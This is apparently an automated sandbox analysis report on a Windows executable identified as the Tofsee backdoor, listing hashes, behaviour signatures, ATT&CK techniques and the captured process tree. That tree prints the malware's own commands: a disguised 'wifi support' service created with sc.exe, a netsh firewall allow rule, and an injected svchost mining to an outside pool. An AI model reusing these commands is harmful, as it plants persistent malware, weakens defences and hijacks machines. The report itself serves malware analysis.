Overview

overview

10

Static

static

fe8cb5b58a...5b.exe

windows7_x64

10

fe8cb5b58a...5b.exe

windows10_x64

10

Analysis

  • max time kernel
    145s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    15-11-2020 22:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b.exe

  • Size

    13.2MB

  • MD5

    32b51d4b10b95d049f96e329d77a87e0

  • SHA1

    c7edc30d62b156fc407dc914a726a19b3108b2e3

  • SHA256

    fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b

  • SHA512

    11408739911bcb93b75c909336fc88733c5702244efa62ae72d8f05276b80da69db362894620f81c323bfebbc0268028de1fe80c9dbf8c121fc598cdaf81a7c0

Score
10/10
tofseeevasionpersistencetrojan

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b.exe
    "C:\Users\Admin\AppData\Local\Temp\fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:980
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nrxkvqii\
      2⤵
        PID:2476
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wijdyuvs.exe" C:\Windows\SysWOW64\nrxkvqii\
        2⤵
          PID:3756
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create nrxkvqii binPath= "C:\Windows\SysWOW64\nrxkvqii\wijdyuvs.exe /d\"C:\Users\Admin\AppData\Local\Temp\fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:640
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description nrxkvqii "wifi internet conection"
            2⤵
              PID:184
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start nrxkvqii
              2⤵
                PID:2696
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:2136
              • C:\Windows\SysWOW64\nrxkvqii\wijdyuvs.exe
                C:\Windows\SysWOW64\nrxkvqii\wijdyuvs.exe /d"C:\Users\Admin\AppData\Local\Temp\fe8cb5b58a6e04b1877ba5d8f1c7b37fdc43a73ae8850daeea7eaefca2fad15b.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1412
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Modifies service
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3020
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:296

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Initial Access

              Execution

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              2
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              3
              T1112

              Credential Access

              Discovery

              Lateral Movement

              Collection

              Exfiltration

              Command and Control

              Impact

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\wijdyuvs.exe
                MD5

                43cb5acf7e9764991c2f2954261ce4c4

                SHA1

                a51fa73b63b8033a546a4f7aef4f1df096b94274

                SHA256

                a505c83a79eec9e82d7305911e2a8e7b95f340bd78c0efc504603cbf3fe6847a

                SHA512

                39500cc5cc1af197e84edb57382c670160fa1e26f784db2c053f0bc381cfbc4ba4307288dee4eae27f624e0dc47c8c4657f38ff3678d9b8cfcc02596d8f61936

                Download Submit
              • C:\Windows\SysWOW64\nrxkvqii\wijdyuvs.exe
                MD5

                43cb5acf7e9764991c2f2954261ce4c4

                SHA1

                a51fa73b63b8033a546a4f7aef4f1df096b94274

                SHA256

                a505c83a79eec9e82d7305911e2a8e7b95f340bd78c0efc504603cbf3fe6847a

                SHA512

                39500cc5cc1af197e84edb57382c670160fa1e26f784db2c053f0bc381cfbc4ba4307288dee4eae27f624e0dc47c8c4657f38ff3678d9b8cfcc02596d8f61936

                Download Submit
              • memory/184-4-0x0000000000000000-mapping.dmp
                Download
              • memory/296-19-0x0000000000CC259C-mapping.dmp
                Download
              • memory/296-17-0x0000000000C30000-0x0000000000D21000-memory.dmp
                Filesize

                964KB

                Download
              • memory/640-3-0x0000000000000000-mapping.dmp
                Download
              • memory/2136-10-0x0000000000000000-mapping.dmp
                Download
              • memory/2476-0-0x0000000000000000-mapping.dmp
                Download
              • memory/2696-5-0x0000000000000000-mapping.dmp
                Download
              • memory/3020-8-0x00000000030A9A6B-mapping.dmp
                Download
              • memory/3020-11-0x0000000004E50000-0x000000000505F000-memory.dmp
                Filesize

                2.1MB

                Download
              • memory/3020-12-0x0000000003230000-0x0000000003236000-memory.dmp
                Filesize

                24KB

                Download
              • memory/3020-13-0x0000000003240000-0x0000000003250000-memory.dmp
                Filesize

                64KB

                Download
              • memory/3020-14-0x00000000032A0000-0x00000000032A5000-memory.dmp
                Filesize

                20KB

                Download
              • memory/3020-15-0x00000000095D0000-0x00000000099DB000-memory.dmp
                Filesize

                4.0MB

                Download
              • memory/3020-16-0x00000000032B0000-0x00000000032B7000-memory.dmp
                Filesize

                28KB

                Download
              • memory/3020-7-0x00000000030A0000-0x00000000030B5000-memory.dmp
                Filesize

                84KB

                Download
              • memory/3756-1-0x0000000000000000-mapping.dmp
                Download